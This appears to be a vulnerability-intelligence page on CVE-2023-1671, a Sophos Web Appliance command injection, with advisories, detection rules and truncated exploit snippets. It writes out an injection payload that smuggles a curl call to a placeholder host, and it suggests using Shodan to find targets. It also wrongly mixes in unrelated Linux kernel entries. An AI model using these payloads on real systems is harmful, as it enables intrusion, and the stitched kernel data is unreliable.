CVE-2023-1671
published 2023-04-04CVE-2023-1671: A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4.3.10.4 allows execution of arbitrary code.
PriorityP197critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2023-12-07
Exploited in the wild
EPSS
100.00%
100.0th percentile
A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4.3.10.4 allows execution of arbitrary code.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| linux | linux_kernel | >= 5.13.0 < 5.15.121 | 5.15.121 |
| linux | linux_kernel | >= 5.16.0 < 6.1.40 | 6.1.40 |
| linux | linux_kernel | >= 6.2.0 < 6.4.5 | 6.4.5 |
| sophos | sophos_web_appliance | >= unspecified < 4.3.10.4 | 4.3.10.4 |
| sophos | web_appliance | < 4.3.10.4 | 4.3.10.4 |
Detection & IOCsextracted from sources · hover to see the quote
commandargs_reason=filetypewarn&url=<rand>&filetype=<rand>&user=<rand>&user_encoded=<base64("';curl http://<oast-url> #")>↗
snort
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Sophos Web Appliance Pre-Auth Command Injection Attempt (CVE-2023-1671)"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:36; content:"|2f|index|2e|php|3f|c|3d|blocked|26|action|3d|continue"; http.request_body; content:"args_reason=filetypewarn&url="; startswith; fast_pattern; content:"&filetype="; content:"&user_encoded="; reference:url,sophos.com/en-us/security-advisories/sophos-sa-20230404-swa-rce; classtype:attempted-admin; sid:2049632; rev:2; metadata:attack_target Client_Endpoint, created_at 2023_12_11, cve CVE_2023_1671, deployment Perimeter, deployment SSLDecrypt, confidence High, signature_severity Major, tag cve_2023_1671, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_27, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services;)
bytes
|2f|index|2e|php|3f|c|3d|blocked|26|action|3d|continue
- →Look for HTTP POST requests to /index.php with query parameters c=blocked&action=continue — this is the vulnerable warn-proceed handler endpoint. ↗
- →Inspect POST body for the pattern: args_reason=filetypewarn combined with a user_encoded parameter containing base64-encoded shell metacharacters (e.g., single-quote, semicolon, shell commands). ↗
- →Detect out-of-band callback activity (DNS/HTTP) from the Sophos Web Appliance host, which would indicate successful command injection via the user_encoded parameter. ↗
- →Use Shodan/FOFA to identify exposed Sophos Web Appliance instances via title or favicon hash as potential targets. ↗
- →The exploit is pre-authentication — no session cookie or login is required. Any POST to the vulnerable endpoint from an unauthenticated source should be treated as suspicious. ↗
- →ET Snort SID 2049632 (rev:2) covers this exploit attempt; ensure IDS/IPS rules are updated to at least this revision.
- ·The Snort/ET rule requires SSL decryption to be effective, as the appliance is typically accessed over HTTPS.
- ·Sophos Web Appliance reached end-of-life on July 20, 2023 and no longer receives updates; patching to 4.3.10.4 was delivered as an automatic patch on April 4, 2023, but only applies to instances that did not disable auto-patch. ↗
- ·The URI bsize match in the Snort rule is exactly 36 bytes; ensure the rule engine supports the bsize keyword correctly to avoid false negatives.
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
cisa9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
MIPS: KVM: Fix NULL pointer dereference
osv·2025-12-30
CVE-2023-54241 MIPS: KVM: Fix NULL pointer dereference
MIPS: KVM: Fix NULL pointer dereference
In the Linux kernel, the following vulnerability has been resolved:
MIPS: KVM: Fix NULL pointer dereference
After commit 45c7e8af4a5e3f0bea4ac209 ("MIPS: Remove KVM_TE support") we
get a NULL pointer dereference when creating a KVM guest:
[ 146.243409] Starting KVM with MIPS VZ extensions
[ 149.849151] CPU 3 Unable to handle kernel paging request at virtual address 0000000000000300, epc == ffffffffc06356ec, ra == ffffffffc063568c
[ 149.849177] Oops[#1]:
[ 149.849182] CPU: 3 PID: 2265 Comm: qemu-system-mip Not tainted 6.4.0-rc3+ #1671
[ 149.849188] Hardware name: THTF CX TL630 Series/THTF-LS3A4000-7A1000-ML4A, BIOS KL4.1F.TF.D.166.201225.R 12/25/2020
[ 149.849192] $ 0 : 0000000000000000 000000007400cce0 0000000000400004 ffffffff8119c740
[ 149.8492
GHSA
GHSA-5f37-m2hf-qphr: A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4
ghsa_unreviewed·2023-04-04
CVE-2023-1671 [CRITICAL] CWE-77 GHSA-5f37-m2hf-qphr: A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4
A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4.3.10.4 allows execution of arbitrary code.
VulnCheck
Sophos Web Appliance Command Injection Vulnerability
vulncheck·2023·CVSS 9.8
CVE-2023-1671 [CRITICAL] CWE-77 Sophos Web Appliance Command Injection Vulnerability
Sophos Web Appliance Command Injection Vulnerability
Sophos Web Appliance contains a command injection vulnerability in the warn-proceed handler that allows for remote code execution.
Affected: Sophos Web Appliance
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-29&host_type=src&vulnerability=cve-2023-1671; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-04&host_type=src&vulnerability=cve-2023-1671; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023
CISA
Sophos Web Appliance Command Injection Vulnerability
cisa·2023-11-16·CVSS 9.8
CVE-2023-1671 [CRITICAL] CWE-77 Sophos Web Appliance Command Injection Vulnerability
Vulnerability: Sophos Web Appliance Command Injection Vulnerability
Affected: Sophos Web Appliance
Sophos Web Appliance contains a command injection vulnerability in the warn-proceed handler that allows for remote code execution.
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Notes: https://www.sophos.com/en-us/security-advisories/sophos-sa-20230404-swa-rce; https://nvd.nist.gov/vuln/detail/CVE-2023-1671
Remediation Due Date: 2023-12-07
Suricata
ET EXPLOIT Sophos Web Appliance Pre-Auth Command Injection Attempt (CVE-2023-1671)
suricata·2023-12-11·CVSS 9.8
CVE-2023-1671 [CRITICAL] ET EXPLOIT Sophos Web Appliance Pre-Auth Command Injection Attempt (CVE-2023-1671)
ET EXPLOIT Sophos Web Appliance Pre-Auth Command Injection Attempt (CVE-2023-1671)
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT Sophos Web Appliance Pre-Auth Command Injection Attempt (CVE-2023-1671)"; flow:established,to_server; http.method; content:"POST"; http.uri; bsize:36; content:"|2f|index|2e|php|3f|c|3d|blocked|26|action|3d|continue"; http.request_body; content:"args_reason=filetypewarn&url="; startswith; fast_pattern; content:"&filetype="; content:"&user_encoded="; reference:url,sophos.com/en-us/security-advisories/sophos-sa-20230404-swa-rce; classtype:attempted-admin; sid:2049632; rev:2; metadata:attack_target Client_Endpoint, created_at 2023_12_11, cve CVE_2023_1671, deployment Perimeter, deployment SSLDecrypt, confidence High, signature_severity Major,
Exploit-DB
Sophos Web Appliance 4.3.10.4 - Pre-auth command injection
exploitdb·2023-04-25·CVSS 9.8
CVE-2023-1671 [CRITICAL] Sophos Web Appliance 4.3.10.4 - Pre-auth command injection
Sophos Web Appliance 4.3.10.4 - Pre-auth command injection
---
#!/bin/bash
# Exploit Title: Sophos Web Appliance 4.3.10.4 - Pre-auth command injection
# Exploit Author: Behnam Abasi Vanda
# Vendor Homepage: https://www.sophos.com
# Version: Sophos Web Appliance older than version 4.3.10.4
# Tested on: Ubuntu
# CVE : CVE-2023-1671
# Shodan Dork: title:"Sophos Web Appliance"
# Reference : https://www.sophos.com/en-us/security-advisories/sophos-sa-20230404-swa-rce
# Reference : https://vulncheck.com/blog/cve-2023-1671-analysis
TARGET_LIST="$1"
# =====================
BOLD="\033[1m"
RED="\e[1;31m"
GREEN="\e[1;32m"
YELLOW="\e[1;33m"
BLUE="\e[1;34m"
NOR="\e[0m"
# ====================
get_new_subdomain()
{
cat MN.txt | grep 'YES' >/dev/null;ch=$?
if [ $ch -eq 0 ];then
echo -e " [+] Trying
Nuclei
Sophos Web Appliance - Remote Code Execution
nuclei·CVSS 9.8
CVE-2023-1671 [CRITICAL] Sophos Web Appliance - Remote Code Execution
Sophos Web Appliance - Remote Code Execution
A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4.3.10.4 allows execution of arbitrary code.
Template:
id: CVE-2023-1671
info:
name: Sophos Web Appliance - Remote Code Execution
author: Co5mos
severity: critical
description: |
A pre-auth command injection vulnerability in the warn-proceed handler of Sophos Web Appliance older than version 4.3.10.4 allows execution of arbitrary code.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
remediation: |
Apply the latest security patches or updates provided by Sophos to mitigate this vulnerability.
reference:
- https://vulncheck.com/blog/cve-2023-1671-anal
Bleepingcomputer
CISA warns of actively exploited Windows, Sophos, and Oracle bugs
blogs_bleepingcomputer·2023-11-17·CVSS 9.8
[CRITICAL] CISA warns of actively exploited Windows, Sophos, and Oracle bugs
## CISA warns of actively exploited Windows, Sophos, and Oracle bugs
## Bill Toulas
The U.S. Cybersecurity & Infrastructure Security Agency has added to its catalog of known exploited vulnerabilities (KEV) three security issues that affect Microsoft devices, a Sophos product, and an enterprise solution from Oracle.
The KEV catalog contains flaws confirmed to be exploited by hackers in attacks and serves as a repository for vulnerabilities that companies all over should treat with priority.
The agency is urging federal agencies to apply available security updates for the three issues before December 7. The three vulnerabilities are tracked as follows:
CVE-2023-36584 – "Mark of the Web" (MotW) security feature bypass on Microsoft Windows.
CVE-2023-1671 – Command injection vulnerability
Bugzilla
CVE-2023-54241 kernel: MIPS: KVM: Fix NULL pointer dereference
bugzilla·2025-12-30
CVE-2023-54241 CVE-2023-54241 kernel: MIPS: KVM: Fix NULL pointer dereference
CVE-2023-54241 kernel: MIPS: KVM: Fix NULL pointer dereference
In the Linux kernel, the following vulnerability has been resolved:
MIPS: KVM: Fix NULL pointer dereference
After commit 45c7e8af4a5e3f0bea4ac209 ("MIPS: Remove KVM_TE support") we
get a NULL pointer dereference when creating a KVM guest:
[ 146.243409] Starting KVM with MIPS VZ extensions
[ 149.849151] CPU 3 Unable to handle kernel paging request at virtual address 0000000000000300, epc == ffffffffc06356ec, ra == ffffffffc063568c
[ 149.849177] Oops[#1]:
[ 149.849182] CPU: 3 PID: 2265 Comm: qemu-system-mip Not tainted 6.4.0-rc3+ #1671
[ 149.849188] Hardware name: THTF CX TL630 Series/THTF-LS3A4000-7A1000-ML4A, BIOS KL4.1F.TF.D.166.201225.R 12/25/2020
[ 149.849192] $ 0 : 0000000000000000 000000007400cce0 0000000000400004 ffff
http://packetstormsecurity.com/files/172016/Sophos-Web-Appliance-4.3.10.4-Command-Injection.htmlhttps://www.sophos.com/en-us/security-advisories/sophos-sa-20230404-swa-rcehttp://packetstormsecurity.com/files/172016/Sophos-Web-Appliance-4.3.10.4-Command-Injection.htmlhttps://www.sophos.com/en-us/security-advisories/sophos-sa-20230404-swa-rcehttps://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2023-1671
2023-04-04
Published
2023-11-16
Added to CISA KEV
Exploited in the wild